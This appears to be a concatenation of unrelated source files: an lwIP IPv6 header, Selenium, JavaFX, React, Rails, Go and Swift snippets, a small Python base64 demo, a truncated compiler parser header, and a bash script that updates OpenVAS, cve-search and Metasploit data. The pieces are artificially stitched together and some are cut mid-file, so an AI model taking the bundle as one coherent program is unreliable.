#define ip6_addr_set_solicitednode(ip6addr, if_id) do{(ip6addr)->addr[0] = PP_HTONL(0xff020000UL); \
                                                      (ip6addr)->addr[1] = 0; \
                                                      (ip6addr)->addr[2] = PP_HTONL(0x00000001UL); \
                                                      (ip6addr)->addr[3] = (PP_HTONL(0xff000000UL) | (if_id));}while(0)
/* Check whether ip6addr is the solicited-node address derived from sn_addr. */
#define ip6_addr_cmp_solicitednode(ip6addr, sn_addr) (((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
                                                      ((ip6addr)->addr[1] == 0) && \
                                                      ((ip6addr)->addr[2] == PP_HTONL(0x00000001UL)) && \
                                                      ((ip6addr)->addr[3] == (PP_HTONL(0xff000000UL) | (sn_addr)->addr[3])))
/* IPv6 address states. The low 3 bits count DAD probes while tentative;
 * bit 0x10 marks a valid (preferred or deprecated) address. */
#define IP6_ADDR_INVALID      0x00
#define IP6_ADDR_TENTATIVE    0x08
#define IP6_ADDR_TENTATIVE_1  0x09 /* 1 probe sent */
#define IP6_ADDR_TENTATIVE_2  0x0a /* 2 probes sent */
#define IP6_ADDR_TENTATIVE_3  0x0b /* 3 probes sent */
#define IP6_ADDR_TENTATIVE_4  0x0c /* 4 probes sent */
#define IP6_ADDR_TENTATIVE_5  0x0d /* 5 probes sent */
#define IP6_ADDR_TENTATIVE_6  0x0e /* 6 probes sent */
#define IP6_ADDR_TENTATIVE_7  0x0f /* 7 probes sent */
#define IP6_ADDR_VALID        0x10 /* This bit marks an address as valid (preferred or deprecated) */
#define IP6_ADDR_PREFERRED    0x30
#define IP6_ADDR_DEPRECATED   0x10 /* Same as VALID (valid but not preferred) */
#define IP6_ADDR_TENTATIVE_COUNT_MASK 0x07 /* 1-7 probes sent */
/* State predicates over the values above. */
#define ip6_addr_isinvalid(addr_state) (addr_state == IP6_ADDR_INVALID)
#define ip6_addr_istentative(addr_state) (addr_state & IP6_ADDR_TENTATIVE)
#define ip6_addr_isvalid(addr_state) (addr_state & IP6_ADDR_VALID) /* Include valid, preferred, and deprecated. */
#define ip6_addr_ispreferred(addr_state) (addr_state == IP6_ADDR_PREFERRED)
#define ip6_addr_isdeprecated(addr_state) (addr_state == IP6_ADDR_DEPRECATED)
/* Debug helper: print eight 16-bit blocks of an IPv6 address in hex. */
#define ip6_addr_debug_print_parts(debug, a, b, c, d, e, f, g, h) \
  LWIP_DEBUGF(debug, ("%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F, \
                      a, b, c, d, e, f, g, h))
/* Debug-print an address via pointer; a NULL pointer prints as all zeros. */
#define ip6_addr_debug_print(debug, ipaddr) \
  ip6_addr_debug_print_parts(debug, \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK1(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK2(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK3(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK4(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK5(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK6(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK7(ipaddr) : 0),    \
                      (u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK8(ipaddr) : 0))
/* Debug-print an address passed by value. */
#define ip6_addr_debug_print_val(debug, ipaddr) \
  ip6_addr_debug_print_parts(debug, \
                      IP6_ADDR_BLOCK1(&(ipaddr)),    \
                      IP6_ADDR_BLOCK2(&(ipaddr)),    \
                      IP6_ADDR_BLOCK3(&(ipaddr)),    \
                      IP6_ADDR_BLOCK4(&(ipaddr)),    \
                      IP6_ADDR_BLOCK5(&(ipaddr)),    \
                      IP6_ADDR_BLOCK6(&(ipaddr)),    \
                      IP6_ADDR_BLOCK7(&(ipaddr)),    \
                      IP6_ADDR_BLOCK8(&(ipaddr)))
/* Maximum length of an IPv6 address string, including the terminator. */
#define IP6ADDR_STRLEN_MAX    46
/* Parse an IPv6 address string into *addr; returns nonzero on success. */
int ip6addr_aton(const char *cp, ip6_addr_t *addr);
/** returns ptr to static buffer; not reentrant! */
char *ip6addr_ntoa(const ip6_addr_t *addr);
/* Reentrant variant writing into the caller-supplied buffer. */
char *ip6addr_ntoa_r(const ip6_addr_t *addr, char *buf, int buflen);

#ifdef __cplusplus
}
#endif

#endif /* LWIP_IPV6 */

#endif /* LWIP_HDR_IP6_ADDR_H */
|
package pages;
import org.openqa.selenium.By;
import org.openqa.selenium.WebElement;
import static support.TestContext.getDriver;
/**
 * Page object for the student's "My Assignments" table.
 * Inherits the shared side-menu navigation from {@link SideMenu}.
 */
public class StudentMyAssignments extends SideMenu {

    /**
     * Locates the button inside the table row whose cell text contains the
     * given assignment name.
     *
     * @param myAssignmentName visible (partial) name of the assignment row
     * @return the row's button element
     */
    private WebElement buttonGoToAssessment(String myAssignmentName) {
        String rowButtonXpath =
                "//td[contains(text(),'" + myAssignmentName + "')]/..//button";
        return getDriver().findElement(By.xpath(rowButtonXpath));
    }
}
|
<gh_stars>1-10
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.female = void 0;
var female = {
"viewBox": "0 0 512 512",
"children": [{
"name": "path",
"attribs": {
"d": "M288,284c55.2-14.2,96-64.3,96-124c0-70.7-57.3-128-128-128S128,89.3,128,160c0,59.6,40.8,109.7,96,124v68h-64v64h64v64h64\r\n\tv-64h64v-64h-64V284z M256,240c-44.1,0-80-35.9-80-80s35.9-80,80-80s80,35.9,80,80S300.1,240,256,240z"
},
"children": []
}]
};
exports.female = female; |
#!/bin/bash
# Refresh vulnerability data sources in one pass: OpenVAS feeds,
# the cve-search database, the APT package index, and Metasploit.
# All command output is appended to a single log file.

# Update the following line to point to your cve-search directory
CVE_SEARCH_DIR="/home/andy/cve-search"
# Update the following line to point to your desired log file
LOG="/home/andy/output.log"

# Start a fresh log: overwrite any previous contents with a single
# timestamp line marking when this run began.
date > "$LOG"

# Update OpenVAS feed data and restart its services to pick it up.
greenbone-nvt-sync >> "$LOG"
greenbone-scapdata-sync >> "$LOG"
greenbone-certdata-sync >> "$LOG"
service openvas-scanner restart >> "$LOG"
service openvas-manager restart >> "$LOG"
openvasmd --rebuild >> "$LOG"

# Update the cve-search database.
"$CVE_SEARCH_DIR"/sbin/db_updater.py -v >> "$LOG"

# Update the system package index, including OpenVAS packages.
apt-get -y update >> "$LOG"

# Update the Metasploit Framework.
msfupdate >> "$LOG"

# Append a marker line so the log shows the update process completed.
echo "Update process done." >> "$LOG"
|
def generate_response(sender_email, recipient_emails):
    """Build a short summary string describing a message's recipients.

    Args:
        sender_email: Address of the sender. Currently unused; kept for
            interface compatibility with existing callers.
        recipient_emails: Sequence of recipient addresses.

    Returns:
        ``"Single recipient: <address>"`` when exactly one recipient is
        given, otherwise ``"Multiple recipients: <count>"`` (including
        the zero-recipient case, which reports a count of 0).
    """
    if len(recipient_emails) == 1:
        return f"Single recipient: {recipient_emails[0]}"
    return f"Multiple recipients: {len(recipient_emails)}"
<reponame>ManuelLuzietti/AnOsuSimulator
package it.unibo.osu.view;
import java.awt.Dimension;
import java.awt.Toolkit;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import it.unibo.osu.controller.MusicControllerImpl;
import it.unibo.osu.controller.MusicControllerImplFactory;
import it.unibo.osu.model.User;
import javafx.animation.Animation;
import javafx.animation.FadeTransition;
import javafx.animation.KeyFrame;
import javafx.animation.KeyValue;
import javafx.animation.ParallelTransition;
import javafx.animation.ScaleTransition;
import javafx.animation.Timeline;
import javafx.animation.TranslateTransition;
import javafx.event.EventType;
import javafx.fxml.FXML;
import javafx.fxml.FXMLLoader;
import javafx.geometry.Insets;
import javafx.scene.Node;
import javafx.scene.control.Button;
import javafx.scene.control.Label;
import javafx.scene.control.ScrollPane;
import javafx.scene.control.Slider;
import javafx.scene.image.ImageView;
import javafx.scene.input.MouseEvent;
import javafx.scene.layout.AnchorPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.Pane;
import javafx.scene.layout.StackPane;
import javafx.scene.layout.VBox;
import javafx.scene.paint.Color;
import javafx.scene.text.Font;
import javafx.stage.Stage;
import javafx.util.Duration;
/**
 * JavaFX controller for the main menu screen: play / options / exit buttons,
 * background music with fade-in/out, an animated icon, an in-place options
 * panel, and the transition into the song-selection menu.
 */
public class MainMenuController extends Resizeable {

    /** Final X translation of the icon when leaving for the song menu. */
    public static final int ICON_FINALPOSITION_X = 1000;
    /** Spacing (px) used for the option HBoxes. */
    private static final int BOX_SPACING = 20;
    /** Duration of the music volume fade in/out. */
    public static final int MUSICFADE_DURATION_SECONDS = 3;
    /** Horizontal shift (px) applied to a button on mouse hover. */
    public static final int TRANSLATE_HOVER = 50;
    /** Scale delta of the pulsing icon animation. */
    public static final double ICONTRANSITION_RATE = 0.1;
    /** Fade-in duration of the song list. */
    public static final int SONGLIST_FADEIN_DURATION_SECONDS = 5;
    /** Slide-in duration of the song list. */
    public static final int MUSIC_TRANSLATE_DURATION_SECONDS = 4;
    /** Font size used for the option labels. */
    public static final int FONT_SIZE = 30;

    // Nodes injected from the FXML layout.
    @FXML
    private StackPane optionPane;
    @FXML
    private StackPane optionButton;
    @FXML
    private StackPane playButton;
    @FXML
    private StackPane exitButton;
    @FXML
    private ImageView icon;
    @FXML
    private AnchorPane pane;
    // Song list loaded separately from SongMenu.fxml in init().
    private ScrollPane scrollPane;
    @FXML
    private VBox vboxButtons;

    // Animations and state built in init()/initializeTransitions().
    private ScaleTransition iconTrans;
    private Pane fixedPane;
    private FadeTransition fadeout;
    private Stage stage;
    private FadeTransition fadeoutOption;
    private FadeTransition fadeinOption;
    private HBox options;
    private TranslateTransition iconTranslateTransition;
    private FadeTransition menuOptionsFadeout;
    private ParallelTransition playEventParallelTransition;
    private FadeTransition songListFadeInTransition;
    private TranslateTransition songListTranslateTransition;
    private MusicControllerImpl scrollMenuSound;
    private MusicControllerImpl clickMenuSound;
    private List<StackPane> mainButtons;
    private MusicControllerImpl menuMusic;
    private Timeline musicFadeIn;
    private Timeline musicFadeOut;
    private SongMenuController songMenuController;

    /**
     * Wires up the whole menu: loads the song menu off-screen (hidden),
     * creates sound effects, installs input handlers, builds transitions and
     * the options panel, and prepares the background music with its fade-in.
     *
     * @param stage the primary stage this menu is shown on
     */
    public void init(final Stage stage) {
        this.stage = stage;
        FXMLLoader loader = new FXMLLoader();
        loader.setLocation(this.getClass().getResource("/fxml/SongMenu.fxml"));
        try {
            fixedPane = ((Pane) this.pane.getParent());
            this.scrollPane = (ScrollPane) loader.load();
            this.songMenuController = (SongMenuController) loader.getController();
            // Park the song list one screen-width to the left, fully
            // transparent, so it can slide/fade in on "play".
            this.scrollPane.setLayoutX(-this.fixedPane.getPrefWidth());
            this.scrollPane.setOpacity(0);
            this.pane.getChildren().add(this.scrollPane);
        } catch (IOException e1) {
            e1.printStackTrace();
        }
        this.scrollMenuSound = MusicControllerImplFactory
                .getEffectImpl("/music/scrollMenuOptions.wav");
        this.clickMenuSound = MusicControllerImplFactory
                .getEffectImpl("/music/clickMenuOptions.wav");
        this.setInputHandlers();
        this.initializeTransitions();
        this.initializeSounds();
        this.gameOptions();
        this.mainButtons = new ArrayList<>();
        this.mainButtons.add(this.playButton);
        this.mainButtons.add(this.optionButton);
        this.mainButtons.add(this.exitButton);
        this.menuMusic = MusicControllerImplFactory
                .getSimpleMusicImpl("/tracks/joshiraku.wav");
        // Fade the menu music from silent up to the user's volume setting.
        this.musicFadeIn = new Timeline(new KeyFrame(Duration.seconds(0),
                new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), 0)),
                new KeyFrame(Duration.seconds(MUSICFADE_DURATION_SECONDS), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(),
                        User.getMusicVolume())));
    }

    /** Placeholder for sound initialization; currently nothing to do. */
    private void initializeSounds() {
    }

    /**
     * Installs mouse handlers on the three main buttons: click actions
     * (exit, play, toggle options) and hover enter/exit effects with a
     * scroll sound.
     */
    private void setInputHandlers() {
        this.exitButton.setOnMouseClicked(exitEvent -> {
            this.clickMenuSound.onNotify();
            // Fade the music out before closing the window.
            this.musicFadeOut = new Timeline(
                    new KeyFrame(Duration.seconds(0), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(),
                            User.getMusicVolume())),
                    new KeyFrame(Duration.seconds(MUSICFADE_DURATION_SECONDS),
                            new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), 0)));
            this.musicFadeOut.play();
            //this.stage.getOnCloseRequest().handle(null);
            this.stage.close();
        });
        this.playButton.setOnMouseClicked(playEvent -> {
            // Hide the options panel if it is currently shown.
            if (this.options.getOpacity() == 1) {
                this.fadeoutOption.play();
            }
            this.musicFadeOut = new Timeline(new KeyFrame(Duration.seconds(0), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), User.getMusicVolume())),
                    new KeyFrame(Duration.seconds(MUSICFADE_DURATION_SECONDS), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), 0)));
            this.musicFadeOut.play();
            this.clickMenuSound.onNotify();
            this.songMenuController.updateEffectsVolume();
            // Slide the icon out, fade the buttons, slide/fade the song list in.
            this.playEventParallelTransition.play();
        });
        this.optionButton.setOnMouseClicked(optionsEvent -> {
            // Toggle the options panel based on its current opacity.
            if (this.options.getOpacity() == 1) {
                this.fadeoutOption.play();
            } else {
                this.fadeinOption.play();
            }
            this.clickMenuSound.onNotify();
        });
        this.exitButton.setOnMouseEntered(e1 -> {
            this.scrollMenuSound.onNotify();
            buttonEffect((Node) this.exitButton, MouseEvent.MOUSE_ENTERED);
        });
        this.exitButton.setOnMouseExited(e2 -> {
            buttonEffect((Node) this.exitButton, MouseEvent.MOUSE_EXITED);
        });
        this.optionButton.setOnMouseEntered(e3 -> {
            this.scrollMenuSound.onNotify();
            buttonEffect((Node) this.optionButton, MouseEvent.MOUSE_ENTERED);
        });
        this.optionButton.setOnMouseExited(e4 -> {
            buttonEffect((Node) this.optionButton, MouseEvent.MOUSE_EXITED);
        });
        this.playButton.setOnMouseEntered(e5 -> {
            this.scrollMenuSound.onNotify();
            buttonEffect((Node) this.playButton, MouseEvent.MOUSE_ENTERED);
        });
        this.playButton.setOnMouseExited(e6 -> {
            buttonEffect((Node) this.playButton, MouseEvent.MOUSE_EXITED);
        });
    }

    /**
     * Hover effect: shifts the node right on mouse-enter and left on exit.
     * NOTE(review): setTranslateX is absolute, so exit sets the node to
     * -TRANSLATE_HOVER rather than restoring 0 — confirm this is intended.
     *
     * @param node         the button node to shift
     * @param mouseEntered MOUSE_ENTERED or MOUSE_EXITED
     */
    private void buttonEffect(final Node node, final EventType<MouseEvent> mouseEntered) {
        if (mouseEntered.equals(MouseEvent.MOUSE_ENTERED)) {
            node.setTranslateX(TRANSLATE_HOVER);
        } else {
            node.setTranslateX(-TRANSLATE_HOVER);
        }
    }

    /**
     * Builds all reusable animations: the pulsing icon, the pane fade-out,
     * the menu-button fade-out, and the parallel transition that plays when
     * the user presses "play".
     */
    private void initializeTransitions() {
        // Endless pulse of the logo icon.
        this.iconTrans = new ScaleTransition();
        this.iconTrans.setNode(this.icon);
        this.iconTrans.setAutoReverse(true);
        this.iconTrans.setCycleCount(Animation.INDEFINITE);
        this.iconTrans.setDuration(Duration.seconds(1));
        this.iconTrans.setByX(ICONTRANSITION_RATE);
        this.iconTrans.setByY(ICONTRANSITION_RATE);
        // Fade the whole fixed pane out, remove the menu pane, then fade
        // back in (reusing the same transition object with swapped values).
        this.fadeout = new FadeTransition();
        this.fadeout.setNode(this.fixedPane);
        this.fadeout.setFromValue(1);
        this.fadeout.setToValue(0);
        this.fadeout.setDuration(Duration.seconds(1));
        this.fadeout.setOnFinished(e -> {
            this.fixedPane.getChildren().remove(this.pane);
            this.fadeout.setFromValue(0);
            this.fadeout.setToValue(1);
            this.fadeout.setDuration(Duration.seconds(1));
            this.fadeout.setOnFinished(null);
            this.fadeout.playFromStart();
        });
        // Fade the main buttons out and hide them once invisible.
        this.menuOptionsFadeout = new FadeTransition(Duration.seconds(1), this.vboxButtons);
        this.menuOptionsFadeout.setToValue(0);
        this.menuOptionsFadeout.setFromValue(1);
        this.menuOptionsFadeout.setOnFinished(finished -> {
            this.mainButtons.forEach(button -> button.setVisible(false));
        });
        this.iconTranslateTransition = new TranslateTransition(Duration.seconds(MUSICFADE_DURATION_SECONDS), this.icon);
        this.iconTranslateTransition.setToX(ICON_FINALPOSITION_X);
        this.songListFadeInTransition = new FadeTransition(Duration.seconds(SONGLIST_FADEIN_DURATION_SECONDS), this.scrollPane);
        this.songListFadeInTransition.setToValue(1);
        this.songListTranslateTransition = new TranslateTransition(Duration.seconds(MUSIC_TRANSLATE_DURATION_SECONDS), this.scrollPane);
        this.songListTranslateTransition.setToX(this.fixedPane.getPrefWidth());
        // Combined "play" animation: icon out, buttons fade, song list in.
        this.playEventParallelTransition = new ParallelTransition(this.iconTranslateTransition, this.menuOptionsFadeout, this.songListFadeInTransition,
                this.songListTranslateTransition);
    }

    /** Starts the idle animation and the background music with its fade-in. */
    public void startAnimation() {
        this.iconTrans.play();
        this.menuMusic.startMusic();
        this.musicFadeIn.play();
    }

    /**
     * Builds the options panel: resolution buttons, FPS toggle buttons, and
     * music / effects volume sliders, initially fully transparent.
     */
    private void gameOptions() {
        this.options = new HBox(BOX_SPACING);
        this.options.setOpacity(0.);
        this.fadeoutOption = new FadeTransition(Duration.seconds(2), options);
        fadeoutOption.setFromValue(1.0);
        fadeoutOption.setToValue(0);
        this.fadeinOption = new FadeTransition(Duration.seconds(2), options);
        this.fadeinOption.setFromValue(0);
        this.fadeinOption.setToValue(1);
        // Resolution label.
        Label resolution = new Label("Resolution");
        resolution.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
        resolution.setTextFill(Color.WHITE);
        // Resolution choice buttons.
        HBox hb = new HBox(BOX_SPACING);
        Button full = new NeonButton("Full screen").getButton();
        Button medium = new NeonButton("1920x1080").getButton();
        Button quadratic = new NeonButton("640x480").getButton();
        hb.getChildren().addAll(full, medium, quadratic);
        options.getChildren().addAll(resolution, hb);
        // FPS-display label.
        Label showFPS = new Label("Show FPS on Game");
        showFPS.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
        showFPS.setTextFill(Color.WHITE);
        // FPS-display yes/no buttons.
        HBox hb1 = new HBox(BOX_SPACING);
        Button yes = new NeonButton("Yes").getButton();
        Button no = new NeonButton("No").getButton();
        hb1.getChildren().addAll(yes, no);
        options.getChildren().addAll(showFPS, hb1);
        // Music volume label.
        Label volume = new Label("Volume");
        volume.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
        volume.setTextFill(Color.WHITE);
        // Music volume slider: updates the user setting live, applies it to
        // the playing music when the mouse is released.
        Slider slider = new Slider(0, 1, 1);
        slider.valueProperty().addListener(changed -> {
            User.setMusicVolume(slider.getValue());
        });
        slider.setOnMouseReleased(released -> {
            this.menuMusic.getMediaPlayer().setVolume(User.getMusicVolume());
        });
        options.getChildren().addAll(volume, slider);
        // Sound-effects volume label.
        Label volumeSfx = new Label("Volume effetti");
        volumeSfx.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
        volumeSfx.setTextFill(Color.WHITE);
        // Sound-effects volume slider.
        Slider sliderSfx = new Slider(0, 1, 1);
        sliderSfx.valueProperty().addListener(changed -> {
            User.setEffectVolume(sliderSfx.getValue());
        });
        sliderSfx.setOnMouseReleased(realeased -> {
            this.clickMenuSound.getMediaPlayer().setVolume(User.getEffectVolume());
            this.scrollMenuSound.getMediaPlayer().setVolume(User.getEffectVolume());
        });
        options.getChildren().addAll(volumeSfx, sliderSfx);
        // Resolution button actions.
        Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize();
        full.setOnMouseClicked(e -> {
            this.changeResolution(this.fixedPane, screenSize.width, screenSize.height);
            this.stage.setFullScreen(true);
        });
        medium.setOnMouseClicked(e -> {
            this.stage.setFullScreen(false);
            this.changeResolution(this.fixedPane, 1920, 1080);
        });
        quadratic.setOnMouseClicked(e -> {
            this.stage.setFullScreen(false);
            this.changeResolution(this.fixedPane, 640, 480);
        });
        this.optionPane.setPadding(new Insets(0, 0, 0, FONT_SIZE));
        this.optionPane.getChildren().add(options);
    }

    /**
     * Applies the new resolution and re-fits and re-centers the stage.
     *
     * @param pane   the pane to resize
     * @param width  the new width in pixels
     * @param height the new height in pixels
     */
    @Override
    public void changeResolution(final Pane pane, final double width, final double height) {
        super.changeResolution(pane, width, height);
        this.stage.sizeToScene();
        this.stage.centerOnScreen();
    }
}
|
<filename>hypfs-master/javascript/node_modules/@iota/area-codes/typings/index.d.ts
export * from "./iacCodeArea";
export * from "./iacDimensions";
export * from "./codePrecision";
export * from "./conversion";
export * from "./precision";
export * from "./extract";
export * from "./validation";
|
import React, { useRef } from 'react';
import useDraggable from '../hooks/useDraggable';
const Item = ({ id, contents }) => {
const dragRef = useRef();
const { isDragging } = useDraggable({
id,
ref: dragRef,
});
return (
<article className="item" ref={dragRef}>
<h3>{contents}</h3>
<p>{`id : #${id}`}</p>
</article>
);
};
export default React.memo(Item);
|
<filename>app/models/note.rb
# A note recorded by a researcher about a specific bat.
class Note < ApplicationRecord
  belongs_to :bat
  belongs_to :researcher

  # A note must have body text.
  validates :content, presence: true
end
|
<filename>internal/app/updateloop/submit_avg.go
package updateloop
import (
"context"
"strings"
"github.com/flandiayingman/arkwaifu/internal/app/avg"
"github.com/flandiayingman/arkwaifu/internal/pkg/arkres"
"github.com/flandiayingman/arkwaifu/internal/pkg/arkres/arkavg"
)
// submitAvg submits the AVG data of the given resource version to the AVG service.
// The AVG data is parsed from the corresponding resource directory.
//
// Note that submitting AVG data is a fully overwrite operation.
// submitAvg submits the AVG data of the given resource version to the AVG service.
// The AVG data is parsed from the corresponding resource directory.
//
// Note that submitting AVG data is a fully overwrite operation.
func (s *Service) submitAvg(ctx context.Context, resVer ResVersion) error {
	avgData, err := getAvg(s.ResDir(resVer))
	if err != nil {
		return err
	}
	return s.AvgService.UpdateAvg(ctx, string(resVer), avgData)
}
// getAvg simply wraps arkavg.GetAvg, and convert the arkavg models to the AVG service models.
// getAvg wraps arkavg.GetAvg and converts the arkavg models into the
// AVG service models. On any error an empty avg.Avg is returned.
func getAvg(resDir string) (avg.Avg, error) {
	rawAvg, err := arkavg.GetAvg(resDir, arkres.DefaultPrefix)
	if err != nil {
		return avg.Avg{}, err
	}
	converted, err := avgFromRaw(&rawAvg, resDir)
	if err != nil {
		return avg.Avg{}, err
	}
	return converted, nil
}
// avgFromRaw converts a raw arkavg.Avg into the AVG service model,
// converting each group in order and failing fast on the first error.
func avgFromRaw(ra *arkavg.Avg, resDir string) (avg.Avg, error) {
	result := make(avg.Avg, 0, len(ra.Groups)) // avg.Avg is a slice of groups
	for _, rawGroup := range ra.Groups {
		g, err := groupFromRaw(&rawGroup, resDir)
		if err != nil {
			return nil, err
		}
		result = append(result, g)
	}
	return result, nil
}
// groupFromRaw converts a raw arkavg.Group — including all of its
// stories — into the AVG service model.
func groupFromRaw(rg *arkavg.Group, resDir string) (avg.Group, error) {
	converted := make([]avg.Story, 0, len(rg.Stories))
	for _, rawStory := range rg.Stories {
		s, err := storyFromRaw(&rawStory, resDir)
		if err != nil {
			return avg.Group{}, err
		}
		converted = append(converted, s)
	}
	return avg.Group{
		ID:      rg.ID,
		Name:    rg.Name,
		Type:    string(rg.Type),
		Stories: converted,
	}, nil
}
// storyFromRaw converts a raw arkavg.Story into the AVG service model,
// resolving the story's assets from the resource directory.
func storyFromRaw(rs *arkavg.Story, resDir string) (avg.Story, error) {
	rawAssets, err := arkavg.GetStoryAssets(resDir, arkres.DefaultPrefix, *rs)
	if err != nil {
		return avg.Story{}, err
	}
	assets := make([]avg.Asset, 0, len(rawAssets))
	for _, rawAsset := range rawAssets {
		assets = append(assets, assetFromRaw(&rawAsset))
	}
	return avg.Story{
		ID:      rs.ID,
		Code:    rs.Code,
		Name:    rs.Name,
		Tag:     string(rs.Tag),
		GroupID: rs.GroupID,
		Assets:  assets,
	}, nil
}
// assetFromRaw maps a raw asset onto the service model, normalizing the
// asset name to lower case.
func assetFromRaw(raw *arkavg.Asset) avg.Asset {
	return avg.Asset{
		Name: strings.ToLower(raw.Name),
		Kind: string(raw.Kind),
	}
}
|
#!/bin/bash
# Exports consumed by a downstream library-packaging step.
export LIBRARY_LICENSES="./mygui/COPYING.MIT"
# NOTE(review): $pfx is expanded here at assignment time and is presumably
# set by the calling environment — confirm. The *.so* glob stays literal in
# the variable and is expanded later by whatever consumes it.
export LIBRARY_COPY_TO_LIB="$pfx/lib/*.so*"
|
import XCTest
/// Shared base class for the project's XCTest cases; subclasses inherit
/// the common setup/teardown hooks defined here.
class CustomTestCase: XCTestCase {

    /// Runs before each test method of a subclass.
    override func setUp() {
        // Perform any necessary setup operations here
    }

    /// Runs after each test method of a subclass.
    override func tearDown() {
        // Perform any necessary teardown operations here
    }
}
"""Demonstrate Base64-encoding a short ASCII message."""
import base64

string = "Hello World!"
# Convert the text to its ASCII byte representation first; b64encode
# operates on bytes, not str.
data_bytes = bytes(string, "ascii")
encoded_string = base64.b64encode(data_bytes)
print(encoded_string)
<gh_stars>0
//===--- Parser.hpp - Sora Language Parser ----------------------*- C++ -*-===//
// Part of the Sora project, licensed under the MIT license.
// See LICENSE.txt in the project root for license information.
//
// Copyright (c) 2019 <NAME>
//===----------------------------------------------------------------------===//
#pragma once
#include "Sora/AST/Decl.hpp"
#include "Sora/AST/OperatorKinds.hpp"
#include "Sora/Common/LLVM.hpp"
#include "Sora/Diagnostics/DiagnosticEngine.hpp"
#include "Sora/Diagnostics/DiagnosticsParser.hpp"
#include "Sora/Lexer/Lexer.hpp"
#include "Sora/Parser/ParserResult.hpp"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/STLExtras.h"
#include "llvm/Support/SaveAndRestore.h"
#include <functional>
namespace sora {
class ASTContext;
class BlockStmt;
class Expr;
class Identifier;
class Lexer;
class LetDecl;
class Pattern;
class SourceFile;
class StmtCondition;
class TypeRepr;
/// Sora Language Parser
///
/// Note: Parsing method should return nullptr when they fail to parse
/// something and can't recover, and return a value when they successfully
/// recovered. They can also use makeParserErrorResult to create a result
/// with an error bit set to tell the caller that an error occurred but
/// we successfully recovered.
/// Alternatively, parsing methods can also use makeParserResult(false, node)
/// to create an error parser result with a value. This can be used to notify
/// the caller that something went wrong during the parsing but it recovered
/// successfully and thus parsing can continue.
class Parser final {
Parser(const Parser &) = delete;
Parser &operator=(const Parser &) = delete;
public:
/// \param sf the SourceFile that this parser will be working on.
/// Its ASTContext, DiagnosticEngine and SourceManager will be used to
/// allocate memory, emit diagnostics and access the file's text.
Parser(SourceFile &file);
/// The ASTContext
ASTContext &ctxt;
/// The Diagnostic Engine
DiagnosticEngine &diagEng;
/// The SourceFile that this parser is working on
SourceFile &sourceFile;
private:
/// The current DeclContext
DeclContext *declContext = nullptr;
/// Our lexer instance
Lexer lexer;
/// The current token being considered by the parser
Token tok;
/// The SourceLoc that's right past-the-end of the last token consumed by the
/// parser.
SourceLoc prevTokPastTheEnd;
/// Whether we can apply the "mut" specifier when parsing a pattern.
bool canApplyMutSpecifier = true;
public:
//===- Source-File Parsing ----------------------------------------------===//
/// Parses a source-file
void parseSourceFile();
//===- Declaration Parsing ----------------------------------------------===//
/// \returns true if the parser is positioned at the start of a declaration.
bool isStartOfDecl() const;
/// Parses a declaration or top-level-declaration.
/// \param isTopLevel if true, only top-level-declarations are allowed, and
/// declarations that can't appear at the top level are diagnosed.
///
/// isStartOfDecl() must return true.
ParserResult<Decl> parseDecl(bool isTopLevel = false);
/// Parses a let-declaration
/// The parser must be positioned on the "let" keyword.
ParserResult<LetDecl> parseLetDecl();
/// Parses a parameter-declaration
/// The parser must be positioned on the identifier.
ParserResult<ParamDecl> parseParamDecl();
/// Parses a parameter-declaration-list
/// The parser must be positioned on the "("
ParserResult<ParamList> parseParamDeclList();
/// Parses a function-declaration.
/// The parser must be positioned on the "func" keyword.
ParserResult<FuncDecl> parseFuncDecl();
//===- Expression Parsing -----------------------------------------------===//
/// Parses an expression
ParserResult<Expr> parseExpr(llvm::function_ref<void()> onNoExpr);
/// Parses an assignement-expression
ParserResult<Expr> parseAssignementExpr(llvm::function_ref<void()> onNoExpr);
/// Consumes an assignement-operator
/// \param result the operator that was found. Will not be changed if no
/// operator was found.
/// \returns SourceLoc() if not found.
SourceLoc consumeAssignementOperator(BinaryOperatorKind &result);
/// Parses a conditional-expression
ParserResult<Expr> parseConditionalExpr(llvm::function_ref<void()> onNoExpr);
/// Binary operator precedences, from highest (0) to lowest (last).
enum class PrecedenceKind : uint8_t {
/// Multiplicative Operators: * / %
Multiplicative = 0,
/// Shift operators: << >>
Shift,
/// Bitwise operators: | ^ &
Bitwise,
/// Additive operators: + -
Additive,
/// Relational operators: == != < <= > >=
Relational,
/// Logical operators: && ||
Logical,
/// Null-Coalescing operator: ??
NullCoalesce,
HighestPrecedence = Multiplicative,
LowestPrecedence = NullCoalesce
};
/// Parses a binary-expression.
///
/// NOTE: This uses precedence-climbing (lowest to highest) in order to
/// respect operator precedences, and \p precedence will be the "starting"
/// precedence (usually it's LowestPrecedence).
ParserResult<Expr>
parseBinaryExpr(llvm::function_ref<void()> onNoExpr,
PrecedenceKind precedence = PrecedenceKind::LowestPrecedence);
/// Consumes an binary-operator
/// \param result the operator that was found. Will not be changed if no
/// operator was found.
